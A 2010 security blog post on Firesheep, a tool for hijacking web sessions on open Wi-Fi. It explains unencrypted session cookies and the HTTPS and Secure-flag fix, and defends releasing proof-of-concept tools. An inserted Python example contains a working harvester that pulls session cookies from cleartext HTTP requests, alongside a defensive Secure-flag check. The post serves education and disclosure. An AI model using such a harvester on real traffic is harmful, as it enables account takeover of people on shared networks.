Power to the PoC: Firesheep Shakes Things Up
11 Nov 2010
Late last month a freelance programmer, Eric Butler, released a proof-of-concept security tool at ToorCon that allows a user on a typical cafe wireless network (like the free and abundant Starbucks wireless networks) to easily gain illegitimate access to other users’ Web 2.0 sessions. This includes applications such as Facebook, Twitter, Google, Hotmail, Flickr and many more. More directly, this means that if you and I were sitting in the same Starbucks using the wireless network, and I were running Firesheep on my computer, once you logged in I would immediately have access to your account. All of this can be downloaded and installed in less than five minutes, and it is as easy as hitting “Go” to start accessing other wireless users’ accounts. For full details, check out earlier articles such as this one (Plugin, FireSheep, Lays Open Web 2.0 Insecurity) or visit the creator’s website directly (Firesheep – codebutler).
It is important to note that this was not some new vulnerability that was recently discovered; it is a very well-known and industry-accepted flaw. The fundamental flaw is that many “secure” personal applications only encrypt traffic to the login page, protecting your username and password, then resume unencrypted traffic. Not only does this give “curious” users on the same unencrypted wireless network access to the potentially sensitive data you view inside the application (email, name, address, contacts, etc.), but it also gives them your session ID, typically stored in a cookie that is sent across the unencrypted link with every page request. This session ID is how the website recognizes your account after you have given your username and password, and once captured it can simply be replayed to gain full access to your account, with no need to know the password at all. The fix is equally well known: serve the whole session over HTTPS and mark the session cookie with the Secure attribute, so the browser never sends it over a plain HTTP request (without that attribute, a single cleartext request to the same domain, even for an image, leaks the cookie). This has been discussed at length many times before, but the industry line has been that the performance costs and requirements associated with encrypting all traffic to their applications make it cost prohibitive.
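To make the mechanism concrete, here is an added example (not Firesheep’s code, and not from the original post) of the two halves of the problem: a Firesheep-style harvester that pulls session cookies out of cleartext HTTP requests using a per-site table of cookie names, and a check that flags Set-Cookie headers lacking the Secure attribute. The host names and cookie names (`social.example.com`, `sid`, `uid`, `auth`) and the captured requests are constructed for illustration; they are not the real cookie names of any of the sites mentioned above.

```python
"""Session-cookie harvesting over cleartext HTTP, and the Secure-flag check.

Added illustration; hosts, cookie names and traffic below are constructed.
"""
from dataclasses import dataclass

# Per-site "handlers": which cookie names carry the session for a given host.
# Hypothetical names, modelled on the idea of Firesheep's per-site handlers.
HANDLERS = {
    "social.example.com": ["sid", "uid"],
    "mail.example.com": ["auth"],
}


@dataclass
class Capture:
    host: str
    cookies: dict


def parse_http_request(raw: bytes):
    """Parse one cleartext HTTP request; return a Capture or None if it
    carries no Host or Cookie header (nothing to hijack)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    host, cookie = headers.get("host"), headers.get("cookie")
    if not host or not cookie:
        return None
    cookies = {}
    for part in cookie.split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            cookies[k] = v
    return Capture(host.split(":")[0], cookies)


def harvest(requests):
    """Return [(host, {session cookie name: value})] for every request to a
    site in HANDLERS whose session cookies travelled in the clear."""
    found = []
    for raw in requests:
        cap = parse_http_request(raw)
        if cap is None or cap.host not in HANDLERS:
            continue
        wanted = {n: cap.cookies[n] for n in HANDLERS[cap.host] if n in cap.cookies}
        if wanted:
            found.append((cap.host, wanted))
    return found


def insecure_set_cookies(set_cookie_headers):
    """Return names of cookies set without the Secure attribute. A browser
    replays such a cookie over plain http://, which is what exposes it on an
    open wireless network even if the login page itself used HTTPS."""
    bad = []
    for h in set_cookie_headers:
        attrs = [a.strip() for a in h.split(";")]
        name = attrs[0].split("=", 1)[0]
        if not any(a.lower() == "secure" for a in attrs[1:]):
            bad.append(name)
    return bad


# Constructed sample traffic as it would be seen on an open wireless network.
SAMPLE_REQUESTS = [
    b"GET /home HTTP/1.1\r\nHost: social.example.com\r\n"
    b"Cookie: sid=abc123; uid=42; lang=en\r\n\r\n",
    b"GET /inbox HTTP/1.1\r\nHost: mail.example.com\r\nCookie: auth=tok9\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: news.example.org\r\nCookie: pref=1\r\n\r\n",
    b"GET /img.png HTTP/1.1\r\nHost: social.example.com\r\n\r\n",
]
# Constructed Set-Cookie headers: the first is the weak setting, the second
# is the corrected one.
SAMPLE_SET_COOKIES = [
    "sid=abc123; Path=/; HttpOnly",
    "auth=tok9; Path=/; Secure; HttpOnly",
]

if __name__ == "__main__":
    for host, cookies in harvest(SAMPLE_REQUESTS):
        print("hijackable session:", host, cookies)
    print("cookies set without Secure:", insecure_set_cookies(SAMPLE_SET_COOKIES))
```

Running it lists the `social.example.com` and `mail.example.com` sessions as hijackable from the captured requests, and reports `sid` as the cookie set without Secure. Note that `HttpOnly` alone does nothing here: it stops script from reading the cookie, not the browser from sending it over cleartext.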
It appears that Firesheep has rocked the boat significantly, with more than 600,000 downloads, and has made this particular type of attack “so easy a caveman could do it” with point-and-click simplicity. Microsoft announced this week that Hotmail will allow full-session encryption as an option for users. While it was mentioned in late September that this announcement would be made later this fall, one can’t help but think it was hastened by the flurry of Firesheep media coverage. Hotmail users should also note that this is just an option, not the default as Gmail has made it since early this year, so it will require the user to be aware of the setting and enable encryption manually, which is unlikely for the majority of the general population.
For those in the information security industry, it is no surprise that actions speak louder than words. For better or for worse, this is the approach that many independent vulnerability researchers have taken for years, because the industry and the general public tend to ignore “bugs” unless a proof-of-concept exploit is created to prove the security impact. There will always be the tar pit of ethical dilemmas surrounding responsible disclosure of both the vulnerability and the PoC exploit, and opponents will claim that by releasing the code you are enabling and encouraging people to use it for malicious purposes. I would argue that knowledge and tools have always been a double-edged sword, but the alternative is concentration of knowledge and power in the few and powerful who make decisions for a general public left in the dark. This is the antithesis of a truly democratic society, which relies on an informed public to apply the appropriate pressure to industry and political representatives in order to create socially beneficial progress.
Firesheep provides a mechanism for someone as technically challenged as my parents to visually recognize the threat this vulnerability poses to their information security and to become aware enough to ask the simple question, “Why don’t they fix this?” My hope is that this sentiment will quickly turn into “They must fix this!” and that large application developers will no longer be able to sweep gaping security holes under the rug thanks to the ignorance of the general public. It is discouraging to consider that we may never achieve a fully proactive security policy in the software industry, but as long as there are companies that drag their feet in implementing best practices, there will be proof-of-concept tools to bring their vulnerabilities to light.